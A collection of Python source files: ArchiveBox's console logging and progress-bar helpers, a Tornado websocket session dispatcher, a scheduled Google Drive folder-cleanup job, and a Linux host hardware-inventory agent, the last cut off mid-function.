self.SHOW_PROGRESS = SHOW_PROGRESS
if self.SHOW_PROGRESS:
self.p = Process(target=progress_bar, args=(seconds, prefix))
self.p.start()
self.stats = {'start_ts': datetime.now(timezone.utc), 'end_ts': None}
def end(self):
"""immediately end progress, clear the progressbar line, and save end_ts"""
end_ts = datetime.now(timezone.utc)
self.stats['end_ts'] = end_ts
if self.SHOW_PROGRESS:
            # terminate if we haven't already terminated
try:
# kill the progress bar subprocess
try:
                    self.p.close()  # must be closed *before* it's terminated
except (KeyboardInterrupt, SystemExit):
print()
raise
except BaseException: # lgtm [py/catch-base-exception]
pass
self.p.terminate()
self.p.join()
# clear whole terminal line
try:
sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH()), ANSI['reset']))
except (IOError, BrokenPipeError):
# ignore when the parent proc has stopped listening to our stdout
pass
except ValueError:
pass
@enforce_types
def progress_bar(seconds: int, prefix: str='') -> None:
"""show timer in the form of progress bar, with percentage and seconds remaining"""
chunk = '█' if PYTHON_ENCODING == 'UTF-8' else '#'
last_width = TERM_WIDTH()
chunks = last_width - len(prefix) - 20 # number of progress chunks to show (aka max bar width)
try:
for s in range(seconds * chunks):
max_width = TERM_WIDTH()
if max_width < last_width:
# when the terminal size is shrunk, we have to write a newline
# otherwise the progress bar will keep wrapping incorrectly
sys.stdout.write('\r\n')
sys.stdout.flush()
chunks = max_width - len(prefix) - 20
pct_complete = s / chunks / seconds * 100
log_pct = (log(pct_complete or 1, 10) / 2) * 100 # everyone likes faster progress bars ;)
bar_width = round(log_pct/(100/chunks))
last_width = max_width
# ████████████████████ 0.9% (1/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['green' if pct_complete < 80 else 'lightyellow'],
(chunk * bar_width).ljust(chunks),
ANSI['reset'],
round(pct_complete, 1),
round(s/chunks),
seconds,
))
sys.stdout.flush()
time.sleep(1 / chunks)
# ██████████████████████████████████ 100.0% (60/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['red'],
chunk * chunks,
ANSI['reset'],
100.0,
seconds,
seconds,
))
sys.stdout.flush()
# uncomment to have it disappear when it hits 100% instead of staying full red:
# time.sleep(0.5)
# sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH()), ANSI['reset']))
# sys.stdout.flush()
except (KeyboardInterrupt, BrokenPipeError):
print()
def log_cli_command(subcommand: str, subcommand_args: List[str], stdin: Optional[str], pwd: str):
cmd = ' '.join(('archivebox', subcommand, *subcommand_args))
stderr('{black}[i] [{now}] ArchiveBox v{VERSION}: {cmd}{reset}'.format(
now=datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S'),
VERSION=VERSION,
cmd=cmd,
**ANSI,
))
stderr('{black} > {pwd}{reset}'.format(pwd=pwd, **ANSI))
stderr()
### Parsing Stage
def log_importing_started(urls: Union[str, List[str]], depth: int, index_only: bool):
_LAST_RUN_STATS.parse_start_ts = datetime.now(timezone.utc)
print('{green}[+] [{}] Adding {} links to index (crawl depth={}){}...{reset}'.format(
_LAST_RUN_STATS.parse_start_ts.strftime('%Y-%m-%d %H:%M:%S'),
len(urls) if isinstance(urls, list) else len(urls.split('\n')),
depth,
' (index only)' if index_only else '',
**ANSI,
))
def log_source_saved(source_file: str):
print(' > Saved verbatim input to {}/{}'.format(SOURCES_DIR_NAME, source_file.rsplit('/', 1)[-1]))
def log_parsing_finished(num_parsed: int, parser_name: str):
_LAST_RUN_STATS.parse_end_ts = datetime.now(timezone.utc)
print(' > Parsed {} URLs from input ({})'.format(num_parsed, parser_name))
def log_deduping_finished(num_new_links: int):
print(' > Found {} new URLs not already in index'.format(num_new_links))
def log_crawl_started(new_links):
print()
print('{green}[*] Starting crawl of {} sites 1 hop out from starting point{reset}'.format(len(new_links), **ANSI))
### Indexing Stage
def log_indexing_process_started(num_links: int):
start_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.index_start_ts = start_ts
print()
print('{black}[*] [{}] Writing {} links to main index...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
**ANSI,
))
def log_indexing_process_finished():
end_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.index_end_ts = end_ts
def log_indexing_started(out_path: str):
if IS_TTY:
sys.stdout.write(f' > ./{Path(out_path).relative_to(OUTPUT_DIR)}')
def log_indexing_finished(out_path: str):
print(f'\r √ ./{Path(out_path).relative_to(OUTPUT_DIR)}')
### Archiving Stage
def log_archiving_started(num_links: int, resume: Optional[float]=None):
start_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.archiving_start_ts = start_ts
print()
if resume:
print('{green}[▶] [{}] Resuming archive updating for {} pages starting from {}...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
resume,
**ANSI,
))
else:
print('{green}[▶] [{}] Starting archiving of {} snapshots in index...{reset}'.format(
start_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
**ANSI,
))
def log_archiving_paused(num_links: int, idx: int, timestamp: str):
end_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.archiving_end_ts = end_ts
print()
print('\n{lightyellow}[X] [{now}] Downloading paused on link {timestamp} ({idx}/{total}){reset}'.format(
**ANSI,
now=end_ts.strftime('%Y-%m-%d %H:%M:%S'),
idx=idx+1,
timestamp=timestamp,
total=num_links,
))
print()
print(' Continue archiving where you left off by running:')
print(' archivebox update --resume={}'.format(timestamp))
def log_archiving_finished(num_links: int):
from core.models import Snapshot
end_ts = datetime.now(timezone.utc)
_LAST_RUN_STATS.archiving_end_ts = end_ts
assert _LAST_RUN_STATS.archiving_start_ts is not None
seconds = end_ts.timestamp() - _LAST_RUN_STATS.archiving_start_ts.timestamp()
if seconds > 60:
duration = '{0:.2f} min'.format(seconds / 60)
else:
duration = '{0:.2f} sec'.format(seconds)
print()
print('{}[√] [{}] Update of {} pages complete ({}){}'.format(
ANSI['green'],
end_ts.strftime('%Y-%m-%d %H:%M:%S'),
num_links,
duration,
ANSI['reset'],
))
print(' - {} links skipped'.format(_LAST_RUN_STATS.skipped))
print(' - {} links updated'.format(_LAST_RUN_STATS.succeeded + _LAST_RUN_STATS.failed))
print(' - {} links had errors'.format(_LAST_RUN_STATS.failed))
if Snapshot.objects.count() < 50:
print()
print(' {lightred}Hint:{reset} To manage your archive in a Web UI, run:'.format(**ANSI))
print(' archivebox server 0.0.0.0:8000')
def log_link_archiving_started(link: "Link", link_dir: str, is_new: bool):
# [*] [2019-03-22 13:46:45] "Log Structured Merge Trees - ben stopford"
# http://www.benstopford.com/2015/02/14/log-structured-merge-trees/
# > output/archive/1478739709
print('\n[{symbol_color}{symbol}{reset}] [{symbol_color}{now}{reset}] "{title}"'.format(
symbol_color=ANSI['green' if is_new else 'black'],
symbol='+' if is_new else '√',
now=datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S'),
title=link.title or link.base_url,
**ANSI,
))
print(' {blue}{url}{reset}'.format(url=link.url, **ANSI))
print(' {} {}'.format(
'>' if is_new else '√',
pretty_path(link_dir),
))
def log_link_archiving_finished(link: "Link", link_dir: str, is_new: bool, stats: dict, start_ts: datetime):
total = sum(stats.values())
    if stats['failed'] > 0:
_LAST_RUN_STATS.failed += 1
elif stats['skipped'] == total:
_LAST_RUN_STATS.skipped += 1
else:
_LAST_RUN_STATS.succeeded += 1
size = get_dir_size(link_dir)
end_ts = datetime.now(timezone.utc)
duration = str(end_ts - start_ts).split('.')[0]
print(' {black}{} files ({}) in {}s {reset}'.format(size[2], printable_filesize(size[0]), duration, **ANSI))
def log_archive_method_started(method: str):
print(' > {}'.format(method))
def log_archive_method_finished(result: "ArchiveResult"):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
# Prettify CMD string and make it safe to copy-paste by quoting arguments
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in result.cmd
)
if result.status == 'failed':
if result.output.__class__.__name__ == 'TimeoutExpired':
duration = (result.end_ts - result.start_ts).seconds
hint_header = [
'{lightyellow}Extractor timed out after {}s.{reset}'.format(duration, **ANSI),
]
else:
hint_header = [
'{lightyellow}Extractor failed:{reset}'.format(**ANSI),
' {reset}{} {red}{}{reset}'.format(
result.output.__class__.__name__.replace('ArchiveError', ''),
result.output,
**ANSI,
),
]
# Prettify error output hints string and limit to five lines
hints = getattr(result.output, 'hints', None) or ()
if hints:
if isinstance(hints, (list, tuple, type(_ for _ in ()))):
            hints = [hint.decode() if isinstance(hint, bytes) else hint for hint in hints]
else:
if isinstance(hints, bytes):
hints = hints.decode()
hints = hints.split('\n')
hints = (
' {}{}{}'.format(ANSI['lightyellow'], line.strip(), ANSI['reset'])
for line in hints[:5] if line.strip()
)
# Collect and prefix output lines with indentation
output_lines = [
*hint_header,
*hints,
'{}Run to see full output:{}'.format(ANSI['lightred'], ANSI['reset']),
*([' cd {};'.format(result.pwd)] if result.pwd else []),
' {}'.format(quoted_cmd),
]
print('\n'.join(
' {}'.format(line)
for line in output_lines
if line
))
print()
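# A minimal sketch of the quoting rule applied above (illustrative only, not part
# of this module's API): arguments containing spaces are wrapped in double quotes
# so the printed command can be copy-pasted into a shell unchanged.
#
#   >>> cmd = ['wget', '-O', 'my page.html', 'https://example.com']
#   >>> ' '.join('"{}"'.format(arg) if ' ' in arg else arg for arg in cmd)
#   'wget -O "my page.html" https://example.com'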
def log_list_started(filter_patterns: Optional[List[str]], filter_type: str):
print('{green}[*] Finding links in the archive index matching these {} patterns:{reset}'.format(
filter_type,
**ANSI,
))
print(' {}'.format(' '.join(filter_patterns or ())))
def log_list_finished(links):
from .index.csv import links_to_csv
print()
print('---------------------------------------------------------------------------------------------------')
print(links_to_csv(links, cols=['timestamp', 'is_archived', 'num_outputs', 'url'], header=True, ljust=16, separator=' | '))
print('---------------------------------------------------------------------------------------------------')
print()
def log_removal_started(links: List["Link"], yes: bool, delete: bool):
print('{lightyellow}[i] Found {} matching URLs to remove.{reset}'.format(len(links), **ANSI))
if delete:
file_counts = [link.num_outputs for link in links if Path(link.link_dir).exists()]
print(
f' {len(links)} Links will be de-listed from the main index, and their archived content folders will be deleted from disk.\n'
f' ({len(file_counts)} data folders with {sum(file_counts)} archived files will be deleted!)'
)
else:
print(
' Matching links will be de-listed from the main index, but their archived content folders will remain in place on disk.\n'
' (Pass --delete if you also want to permanently delete the data folders)'
)
if not yes:
print()
print('{lightyellow}[?] Do you want to proceed with removing these {} links?{reset}'.format(len(links), **ANSI))
try:
assert input(' y/[n]: ').lower() == 'y'
except (KeyboardInterrupt, EOFError, AssertionError):
raise SystemExit(0)
def log_removal_finished(all_links: int, to_remove: int):
if all_links == 0:
print()
print('{red}[X] No matching links found.{reset}'.format(**ANSI))
else:
print()
print('{red}[√] Removed {} out of {} links from the archive index.{reset}'.format(
to_remove,
all_links,
**ANSI,
))
print(' Index now contains {} links.'.format(all_links - to_remove))
def log_shell_welcome_msg():
from .cli import list_subcommands
print('{green}# ArchiveBox Imports{reset}'.format(**ANSI))
print('{green}from core.models import Snapshot, User{reset}'.format(**ANSI))
print('{green}from archivebox import *\n {}{reset}'.format("\n ".join(list_subcommands().keys()), **ANSI))
print()
print('[i] Welcome to the ArchiveBox Shell!')
print(' https://github.com/ArchiveBox/ArchiveBox/wiki/Usage#Shell-Usage')
print()
print(' {lightred}Hint:{reset} Example use:'.format(**ANSI))
print(' print(Snapshot.objects.filter(is_archived=True).count())')
print(' Snapshot.objects.get(url="https://example.com").as_json()')
print(' add("https://example.com/some/new/url")')
### Helpers
@enforce_types
def pretty_path(path: Union[Path, str]) -> str:
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
pwd = Path('.').resolve()
# parent = os.path.abspath(os.path.join(pwd, os.path.pardir))
return str(path).replace(str(pwd) + '/', './')
@enforce_types
def printable_filesize(num_bytes: Union[int, float]) -> str:
for count in ['Bytes','KB','MB','GB']:
        if -1024.0 < num_bytes < 1024.0:
return '%3.1f %s' % (num_bytes, count)
num_bytes /= 1024.0
return '%3.1f %s' % (num_bytes, 'TB')
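# Illustrative behaviour of printable_filesize (example values, not exhaustive):
#
#   >>> printable_filesize(2048)
#   '2.0 KB'
#   >>> printable_filesize(3.5 * 1024 ** 3)
#   '3.5 GB'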
@enforce_types
def printable_folders(folders: Dict[str, Optional["Link"]],
with_headers: bool=False) -> str:
return '\n'.join(
f'{folder} {link and link.url} "{link and link.title}"'
for folder, link in folders.items()
)
@enforce_types
def printable_config(config: ConfigDict, prefix: str='') -> str:
return f'\n{prefix}'.join(
f'{key}={val}'
for key, val in config.items()
if not (isinstance(val, dict) or callable(val))
)
@enforce_types
def printable_folder_status(name: str, folder: Dict) -> str:
if folder['enabled']:
if folder['is_valid']:
            color, symbol, note, num_files = 'green', '√', 'valid', ''
else:
color, symbol, note, num_files = 'red', 'X', 'invalid', '?'
else:
color, symbol, note, num_files = 'lightyellow', '-', 'disabled', '-'
if folder['path']:
if Path(folder['path']).exists():
num_files = (
f'{len(os.listdir(folder["path"]))} files'
if Path(folder['path']).is_dir() else
printable_filesize(Path(folder['path']).stat().st_size)
)
else:
num_files = 'missing'
path = str(folder['path']).replace(str(OUTPUT_DIR), '.') if folder['path'] else ''
if path and ' ' in path:
path = f'"{path}"'
# if path is just a plain dot, replace it back with the full path for clarity
if path == '.':
path = str(OUTPUT_DIR)
return ' '.join((
ANSI[color],
symbol,
ANSI['reset'],
name.ljust(21),
num_files.ljust(14),
ANSI[color],
note.ljust(8),
ANSI['reset'],
path.ljust(76),
))
@enforce_types
def printable_dependency_version(name: str, dependency: Dict) -> str:
version = None
if dependency['enabled']:
if dependency['is_valid']:
color, symbol, note, version = 'green', '√', 'valid', ''
parsed_version_num = re.search(r'[\d\.]+', dependency['version'])
if parsed_version_num:
version = f'v{parsed_version_num[0]}'
if not version:
color, symbol, note, version = 'red', 'X', 'invalid', '?'
else:
color, symbol, note, version = 'lightyellow', '-', 'disabled', '-'
path = str(dependency["path"]).replace(str(OUTPUT_DIR), '.') if dependency["path"] else ''
if path and ' ' in path:
path = f'"{path}"'
return ' '.join((
ANSI[color],
symbol,
ANSI['reset'],
name.ljust(21),
version.ljust(14),
ANSI[color],
note.ljust(8),
ANSI['reset'],
path.ljust(76),
))
|
base_socketsM.py
|
import tornado.websocket
import json
from multiprocessing import Process
import definitions
SERVER = definitions.SERVER
class SuperBaseSocket(tornado.websocket.WebSocketHandler):
def open(self, id_sessions, Session):
_id = self.get_argument("id", None, True)
if not _id:
self.current_session = Session()
        else:
            # reuse the session registered for this id, or fall back to creating one below
            try:
                self.current_session = id_sessions['{}'.format(_id)]
            except KeyError:
                self.current_session = None
if self.current_session:
pass
else:
self.current_session = Session(_id)
id_sessions['{}'.format(_id)] = self.current_session
def on_message(self, message):
json_string = u'%s' % (message)
message = json.loads(json_string)
receiver = message['receiver']
algorithm = message['algorithm']
method = message['method']
key = list(method.keys())[0]
if receiver == SERVER:
if algorithm:
translator = __import__('algorithms.{}.translator'.format(algorithm)).__dict__['{}'.format(algorithm)].__dict__['translator']
mt = Process(target=translator.__dict__[key], args=(self.current_session, method[key]))
mt.start()
#translator.__dict__[key](self.current_session, method[key])
else:
self.__getattribute__(key)(method[key])
else:
self.current_session.__getattribute__('socket_{}'.format(receiver)).send(message)
self.write_message('Sent')
def on_close(self):
pass
class SocketCFD(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketCFD, self).open(id_sessions, Session)
print('CFD connection open')
def on_close(self):
print('Closing CFD connection')
class SocketModel3D(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketModel3D, self).open(id_sessions, Session)
print('3D connection open')
def on_close(self):
print('Closing 3D connection')
class SocketDesign(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketDesign, self).open(id_sessions, Session)
print('Design connection open')
def on_close(self):
print('Closing Design connection')
class SocketHandler(SuperBaseSocket):
def open(self, id_sessions, Session):
super(SocketHandler, self).open(id_sessions, Session)
print('Handler connection open')
def on_close(self):
print('Closing Handler connection')
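# Minimal wiring sketch (illustrative only; the Session class, route, and port are
# assumptions, not part of this module). Tornado passes URL capture groups to open(),
# so one simple way to supply the shared session registry is a thin subclass that
# closes over module-level state:
#
#   import tornado.ioloop
#   import tornado.web
#
#   class Session(object):              # placeholder session object
#       def __init__(self, _id=None):
#           self.id = _id
#
#   ID_SESSIONS = {}
#
#   class BoundSocketHandler(SocketHandler):
#       def open(self):
#           super(BoundSocketHandler, self).open(ID_SESSIONS, Session)
#
#   app = tornado.web.Application([(r'/ws', BoundSocketHandler)])
#   app.listen(8888)
#   tornado.ioloop.IOLoop.current().start()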
|
drive_cleanup.py
|
import logging
import threading
from datetime import datetime, timedelta
from threading import Thread
from apiclient import discovery
logger = logging.getLogger(__name__)
DELAY_SECS = 60 * 5
MAX_FOLDER_AGE_MINS = 60 # An hour
class DriveCleanup:
SCOPES = 'https://www.googleapis.com/auth/drive'
drive = None
stopped = False
def __init__(self, credentials):
self.drive = discovery.build(serviceName='drive', version='v3', credentials=credentials)
self.stopped_event = threading.Event()
def start(self):
def job():
logger.info("Scheduled drive cleanup job")
while not self.stopped:
self._delete_old_no_raise()
self.stopped_event.wait(DELAY_SECS)
Thread(target=job).start()
return self
def stop(self):
logger.info("Stopping drive cleanup job")
self.stopped = True
self.stopped_event.set()
def _delete_old_no_raise(self):
try:
self._delete_old()
        except Exception:
logger.exception('Failed to delete old drive files')
def _delete_old(self):
logger.info("Searching for old drive folders")
now = datetime.utcnow()
max_folder_modification = (now - timedelta(minutes=MAX_FOLDER_AGE_MINS)).isoformat("T")
query = "mimeType = 'application/vnd.google-apps.folder' and modifiedTime <= '{}'" \
.format(max_folder_modification)
results = self.drive.files().list(q=query, fields="files(id, name)").execute()
files = results.get('files', [])
for file in files:
file_id = file['id']
logger.info("Deleting old folder. id=" + file_id + ', name=' + file['name'])
self.drive.files().delete(fileId=file_id).execute()
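# Minimal usage sketch (illustrative; how `credentials` is obtained depends on the
# deployment -- the service-account file below is only an assumption):
#
#   from google.oauth2 import service_account
#
#   credentials = service_account.Credentials.from_service_account_file(
#       'service-account.json', scopes=[DriveCleanup.SCOPES])
#   cleaner = DriveCleanup(credentials).start()   # runs the cleanup loop in a background thread
#   ...
#   cleaner.stop()                                # sets the stop event and lets the thread exit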
|
sys_agent_unit.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2007 Free Software Foundation, Inc. <https://fsf.org/>
#
# Licensed under the GNU General Public License, version 3 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://jxself.org/translations/gpl-3.zh.shtml
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sfo_agent.kafka_producer import ProduceKafkaInfo
from sfo_common.agent import Agent
from sfo_common.import_common import *
#schedule tasks
def get_host_json_schl():
'''
    Run host hardware information collection in a separate thread on a schedule.
    Using a thread keeps the main process's schedule loop from blocking while the function runs.
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_host_json).start()
except Exception as ex:
logger.info("get_host_json_schl function excute exception:" + str(ex))
def get_node_json_schl():
'''
    Run host status data collection in a separate thread on a schedule.
    Using a thread keeps the main process's schedule loop from blocking while the function runs.
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_node_json,args=['SfoNodeStat']).start()
except Exception as ex:
logger.exception("get_node_json_schl function excute exception:" + str(ex))
def get_node_disk_stat_json_schl():
'''
    Run disk performance data collection in a separate thread on a schedule.
    Using a thread keeps the main process's schedule loop from blocking while the function runs.
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_node_disk_stat_json).start()
except Exception as ex:
logger.exception("get_node_disk_stat_json_schl function excute exception:" + str(ex))
def get_host_monitor_json_schl():
'''
    Run monitoring data collection in a separate thread on a schedule.
    Using a thread keeps the main process's schedule loop from blocking while the function runs.
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_host_monitor_json).start()
except Exception as ex:
logger.exception("get_host_monitor_json_schl function excute exception:" + str(ex))
def get_ring_json_schl():
'''
    Run ring information collection in a separate thread on a schedule.
    Using a thread keeps the main process's schedule loop from blocking while the function runs.
:return:
'''
try:
ia = InfoAcquisition()
threading.Thread(target=ia.get_ring_json).start()
except Exception as ex:
logger.exception("get_ring_json_schl function excute exception:" + str(ex))
class SysUnitAgnet(Agent):
def __init__(self, pidfile):
Agent.__init__(self, pidfile)
def run(self):
'''
        Override Agent.run() to implement the daemon's scheduled work.
:return:
'''
try:
sys.stdout.flush()
hostname = socket.getfqdn()
hostip = socket.gethostbyname(hostname)
logger.info("hostname is {}, ip is {}".format(hostname, hostip))
# use schedule
schedule.every(config.host_refresh).seconds.do(get_host_json_schl)
schedule.every(config.node_refresh).seconds.do(get_node_json_schl)
schedule.every(config.disk_refresh).seconds.do(get_node_disk_stat_json_schl)
schedule.every(config.mon_refresh).seconds.do(get_host_monitor_json_schl)
schedule.every(config.host_refresh).seconds.do(get_ring_json_schl)
schedule.run_all(0)
while True:
schedule.run_pending()
time.sleep(1)
except Exception as ex:
logger.exception("sysunitagent was stopped by exception {}".format(str(ex)))
class HostInfo(object):
'''
    Host hardware information collection class.
'''
def __init__(self):
pass
def get_os_info(self):
'''
        Get operating system version information.
:return:
'''
osinfo = {}
try:
osinfo['host_name'] = socket.getfqdn()
osinfo['os_version'] = "-".join(platform.linux_distribution())
osinfo['os_kernel_version'] = platform.release()
return osinfo
except Exception as ex:
logger.exception("get_os_info function excute exception:" + str(ex))
def get_cpu_dev_info(self):
'''
        Get CPU hardware information.
:return:
'''
try:
result = util.excute_command('lscpu')
if result:
parser = reg_templates.CPUInfoParser(result)
return parser.parse_items()
except Exception as ex:
logger.exception("get_cpu_info function excute exception:" + str(ex))
def get_mem_dev_info(self):
'''
        Get memory hardware information.
:return:
'''
try:
result = util.excute_command('dmidecode -t memory')
if result:
parser = reg_templates.DmidecodeMemory(result)
rec = parser.parse()
return rec
except Exception as ex:
logger.exception("get_mem_dev_info function excute exception:" + str(ex))
def get_bios_dev_info(self):
'''
        Get the host's BIOS information.
:return:
'''
try:
rec = {}
biosdata = util.excute_command('dmidecode -t bios')
if biosdata :
parser = reg_templates.DmidecodeBios(biosdata)
resbios = parser.parse()
if resbios.has_key('mf_bios_version'):
rec['mf_bios_version'] = resbios['mf_bios_version']
else:
rec['mf_bios_version'] = 'N/A'
if resbios.has_key('mf_bios_date'):
rec['mf_bios_date'] = resbios['mf_bios_date']
else:
rec['mf_bios_date'] = 'N/A'
sysdata = util.excute_command('dmidecode -t system')
if sysdata :
sysparser = reg_templates.DmidecodeSystem(sysdata)
ressys = sysparser.parse()
if ressys.has_key('mf_name'):
rec['mf_name'] = ressys['mf_name']
else:
rec['mf_name'] = 'N/A'
if ressys.has_key('mf_model'):
rec['mf_model'] = ressys['mf_model']
else:
rec['mf_model'] = 'N/A'
if ressys.has_key('mf_serial_number'):
rec['mf_serial_number'] = ressys['mf_serial_number']
else:
rec['mf_serial_number'] = 'N/A'
memdata = util.excute_command('dmidecode -t memory')
if memdata :
memparser = reg_templates.DmidecodeMemory(memdata)
resmem = memparser.parse()
total = 0
frq = []
sngsize = []
num = 0
if resmem.has_key('mem_single_size'):
sngs = str(resmem['mem_single_size']).split(',')
for sng in sngs:
if str(sng).strip() not in sngsize:
if str(sng).replace('MB','').strip().isdigit():
sngsize.append(str(sng).strip())
if 'MB' in sng:
tmp = str(sng).replace('MB','').strip()
if tmp.isdigit():
total += int(tmp)
num += 1
rec['mem_single_size'] = ', '.join(sngsize)
else:
rec['mem_single_size'] = 'N/A'
if resmem.has_key('mem_total'):
rec['mem_total'] = 'Max:{}, Now:{} GB'.format(resmem['mem_total'],str(total/1024))
else:
rec['mem_total'] = 'N/A'
if resmem.has_key('mem_number'):
rec['mem_number'] = 'Max:{}, Now:{}'.format(resmem['mem_number'],str(num))
else:
rec['mem_number'] = 'N/A'
if resmem.has_key('mem_frequency'):
frqs = str(resmem['mem_frequency']).split(',')
for rq in frqs:
if str(rq).strip() not in frq:
if str(rq).replace('MHz','').strip().isdigit():
frq.append(str(rq).strip())
rec['mem_frequency'] = ', '.join(frq)
else:
rec['mem_frequency'] = 'N/A'
return rec
except Exception as ex:
logger.exception("get_bios_dev_info function excute exception:" + str(ex))
def get_net_dev_info(self):
'''
        Get NIC (network interface) hardware information.
:return:
'''
try:
eth = []
res = {}
eth_res = {}
mac_res = {}
ip_res = {}
ctl_res = {}
addrs = psutil.net_if_addrs()
stats = psutil.net_if_stats()
nets = addrs.keys()
for net in nets:
if 'eth' in net or 'bond' in net:
eth.append(net)
eth_res[net] = '{}Mb/s'.format(stats[net].speed)
for ip_addr in addrs[net]:
if ip_addr[0] == 2:
ip_res[net] = ip_addr[1]
if ip_addr[0] == 17:
mac_res[net] = ip_addr[1]
if not ip_res.has_key(net):
ip_res[net] = 'N/A'
                    # get the hardware model of this NIC
ethdata = util.excute_command('ethtool -i ' + net)
ethparser = reg_templates.BusinfoParser(ethdata)
ethrec = ethparser.parse()
if ethrec.has_key('businfo'):
businfo = str(ethrec['businfo']).replace('0000:', '')
contrinfo = util.excute_command("lspci | grep -i '" + businfo + "'")
ctlinfo = contrinfo.split(':')[2]
ctl_res[net] = ctlinfo
res['net_speed'] = json.dumps(eth_res, encoding='utf-8', ensure_ascii=True)
res['net_number'] = len(eth)
res['net_mac_address'] = json.dumps(mac_res, encoding='utf-8', ensure_ascii=True)
res['net_ip_address'] = json.dumps(ip_res, encoding='utf-8', ensure_ascii=True)
res['net_model'] = json.dumps(ctl_res, encoding='utf-8', ensure_ascii=True)
return res
except Exception as ex:
logger.exception("get_net_dev_info function excute exception:" + str(ex))
def get_disk_dev_info(self):
'''
        Get disk hardware information.
:return:
'''
try:
rec = {}
sysdata = util.excute_command("dmidecode -t system")
factory = re.search('Manufacturer: .*',sysdata)
if factory :
fname = str(factory.group(0)).split(':')[1].strip()
if fname.upper().strip() == "HP":
rec = self.get_hp_disk_dev_info()
else:
rec = self.get_lsi_disk_dev_info()
return rec
except Exception as ex:
logger.exception("get_disk_dev_info function excute exception:" + str(ex))
def get_disk_names(self):
'''
        Get the names of all disks on the host (uses blkid; some disks may not be visible in certain cases, use with care).
:return:
'''
try:
result = util.excute_command('blkid')
if result :
parser = reg_templates.DiskNameParser(result)
return parser.parse()
except Exception as ex:
logger.exception("get_disk_name function excute exception:" + str(ex))
def get_hp_disk_dev_info(self):
'''
        Get disk information on HP servers.
:return:
'''
try:
rec = {}
diskary = self.get_lsscsi_disk_info()
if diskary:
raid_type = {}
disk_usize = {}
disk_capacity = {}
disknum = 0
diskgroup = 0
disk_number = {}
disk_rate = {}
for ary in diskary:
if ary is None:
continue
aryid = str(ary['disk_lname']).replace('/dev/sd','').upper()
lcmdstr = 'hpssacli ctrl slot=0 array {} ld all show'.format(aryid)
pcmdstr = 'hpssacli ctrl slot=0 array {} pd all show'.format(aryid)
ldata = util.excute_command(lcmdstr)
pdata = util.excute_command(pcmdstr)
if ldata and 'Error' not in ldata:
diskgroup += 1
m_data = re.findall('\(.*\)',ldata)
if len(m_data) > 1:
for dt in m_data:
if 'OK' in dt:
if len(str(dt).split(',')) > 2:
raid_type[ary['disk_lname']] = str(str(dt).split(',')[1])
disk_usize[ary['disk_lname']] = str(str(dt).split(',')[0]).replace('(','')
if pdata and 'Error' not in pdata:
tp = []
sz = []
mydata = re.findall('\(.*\)', pdata)
if len(mydata) > 1:
for data in mydata:
if 'OK' in data:
disknum += 1
mdata = str(data).split(',')
if len(mdata) > 2:
tp.append(str(mdata[1]).strip())
sz.append(str(mdata[2]).strip())
if len(tp) > 0 and len(sz) > 0:
dtype = ','.join(tp)
dsize = ','.join(sz)
disk_capacity[ary['disk_lname']] = '{}-{}'.format(dsize,dtype)
disk_number['disknum'] = disknum
disk_number['diskgroup'] = diskgroup
rec['disk_type'] = json.dumps(raid_type, encoding='utf-8', ensure_ascii=True)
rec['disk_number'] = json.dumps(disk_number, encoding='utf-8', ensure_ascii=True)
rec['disk_useful_size'] = json.dumps(disk_usize, encoding='utf-8', ensure_ascii=True)
rec['disk_capacity'] = json.dumps(disk_capacity, encoding='utf-8', ensure_ascii=True)
rec['disk_rw_rate'] = json.dumps(disk_rate, encoding='utf-8', ensure_ascii=True)
return rec
except Exception as ex:
logger.exception("get_hp_disk_dev_info function excute exception:" + str(ex))
def get_lsi_disk_dev_info(self):
'''
        Get disk information for LSI RAID controllers.
:return:
'''
try:
rec = {}
diskgroups = self.get_lsscsi_disk_info()
if diskgroups:
raid_type = {}
disk_usize = {}
disk_capacity = {}
disknum = 0
diskgroup = 0
disk_number = {}
disk_rate = {}
for group in diskgroups:
if str(group['disk_manufacturer']).upper().strip() == "HP":
raise RuntimeError('This Raid card is not supported!')
ids = str(group['disk_id']).split(':')
groupinfo = self.get_lsi_diskgroup_info(ids[0],str("DISK GROUP: {}".format(str(ids[2]))),str("DISK GROUP: {}".format(str(int(ids[2])+1))))
                    if groupinfo and str(groupinfo) != "N/A":
diskgroup += 1
groupparser = reg_templates.DiskGroupParser(groupinfo)
grouprec = groupparser.parse()
if grouprec.has_key('raid_type'):
raid_type[group['disk_lname']] = "Raid {}".format(str(grouprec['raid_type']))
if grouprec.has_key('disk_num'):
disknum += int(grouprec['disk_num'])
if grouprec.has_key('disk_size'):
disk_usize[group['disk_lname']] = str(grouprec['disk_size'])
if grouprec.has_key('disk_capacity') and grouprec.has_key('disk_type'):
